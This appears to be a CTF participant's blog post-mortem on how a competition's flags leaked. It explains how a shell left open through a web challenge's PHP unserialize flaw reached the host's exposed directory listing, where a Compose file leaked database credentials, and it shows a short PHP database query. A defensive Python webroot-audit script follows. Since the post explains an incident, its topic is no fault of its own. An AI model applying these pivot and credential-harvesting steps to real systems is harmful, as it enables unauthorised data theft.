First of all, I hope there is no misunderstanding: I didn't abuse the server. During a bout of insomnia, I saw that all the flags of the ongoing CTF on CTFTime had been leaked. Using the reverse shell that had been left open through the web challenge a few hours earlier, I was able to identify all the causes 10 minutes after the server went down.
It's not very technical, but I decided to write this down as an explanation for the dumbfounded participants.
Cause
The web challenge Brutus has a vulnerability in PHP unserialize, which gives the user remote code execution (RCE).
This vuln allows a reverse shell to be created, and there is no time-out check: even five hours after the problem was solved, the connection was still there. Thanks to that, analysis was very comfortable.
The /etc/hosts file shows that the internal IP address of the challenge server is 172.26.0.4. Unless it is specifically managed otherwise, the address of the host server can be expected to be 172.26.0.1 or somewhere near it.
```
www-data@5841bda2da57:/code$ curl 172.26.0.1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="mellivora/">mellivora/</a></td><td align="right">2020-02-21 22:08  </td><td align="right">  - </td><td></td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 172.26.0.1 Port 80</address>
</body></html>
```
So a web server is running on 172.26.0.1.
Here you can see one folder, and from its name and internal files you can tell that it is using the Mellivora CTF engine.
Accessing the internal folder was of course possible, and when you crawl it and open it in your browser, it looks like this:
The GitHub page of the Mellivora engine can be found, the modification date gives another hint, and the file docker-compose.dev.yml contains the credentials of the CTF engine.
Below are the contents of the file docker-compose.dev.yml.
The CTF service is provided through two containers, mysql:5.6 and mellivora, using docker-compose. And since the database account credentials have been leaked, we can access the CTF database.
```php
<?php
// Connect from the challenge container to the MySQL container on the host with the leaked credentials
$con = new mysqli('172.26.0.1', '[redacted]', '[redacted]', '[redacted]');
// List every database visible to that account
$res = $con->query('show databases')->fetch_all();
var_dump($res);
```
Therefore, by executing PHP code like this from the web challenge's shell, all tables and columns in the database (including user credentials and flags) could be leaked, and since we have root privileges we could even drop all databases (I didn't test this unnecessarily).
In this case, it is the result of incredibly bad management. The web services run in Docker, so there is no need to install a web server on the host that lets anyone browse its directories, nor to put the Docker files in the webroot.
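As an added example (not code from the post or from the Mellivora project), the script below audits a webroot the way an organizer should before serving it: it finds Compose and env files under the directory and lists the credential-like keys they contain. The sample webroot and its values are constructed placeholders, and the file-name and key patterns are assumptions.

```python
import os
import re
import tempfile

# Names that should never be reachable from a webroot (assumed patterns).
SENSITIVE_NAME = re.compile(r"^(docker-compose.*\.ya?ml|\.env.*|Dockerfile)$")
# Env keys whose values are credentials (MYSQL_* is what the mysql:5.6 image uses).
SECRET_KEY = re.compile(r"PASSWORD|PASSWD|SECRET|TOKEN|API_KEY", re.I)
# Both compose env styles: "KEY: value" and "- KEY=value".
ENV_LINE = re.compile(r"^\s*-?\s*([A-Z][A-Z0-9_]*)\s*[:=]\s*\S")

def secret_keys_in(path):
    """Return env keys in the file whose name looks like a credential."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        keys = [m.group(1) for m in map(ENV_LINE.match, fh) if m]
    return [k for k in keys if SECRET_KEY.search(k)]

def audit_webroot(webroot):
    """Map each exposed compose/env file (relative path) to its secret keys."""
    report = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if SENSITIVE_NAME.match(name):
                full = os.path.join(dirpath, name)
                report[os.path.relpath(full, webroot)] = secret_keys_in(full)
    return report

# Constructed sample mirroring the post's layout; the values are placeholders.
SAMPLE_COMPOSE = """services:
  db:
    image: mysql:5.6
    environment:
      MYSQL_ROOT_PASSWORD: placeholder-root-pw
      MYSQL_DATABASE: mellivora
  web:
    image: mellivora
    environment:
      - DB_PASSWORD=placeholder-app-pw
"""

def demo():
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "mellivora"))
        with open(os.path.join(root, "mellivora", "docker-compose.dev.yml"), "w") as fh:
            fh.write(SAMPLE_COMPOSE)
        return audit_webroot(root)

if __name__ == "__main__":
    for path, keys in demo().items():
        print(path, "->", ", ".join(keys) or "no secret keys")
```

Run it against the real webroot with `audit_webroot("/var/www/html")` before the directory is exposed; any non-empty result means credentials are one `curl` away for anyone who can reach the host.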
I don’t know if it’s true, but there are rumors that the organizer of this CTF hasn’t paid the right amount of money for years. (If you know the truth, please leave a comment.)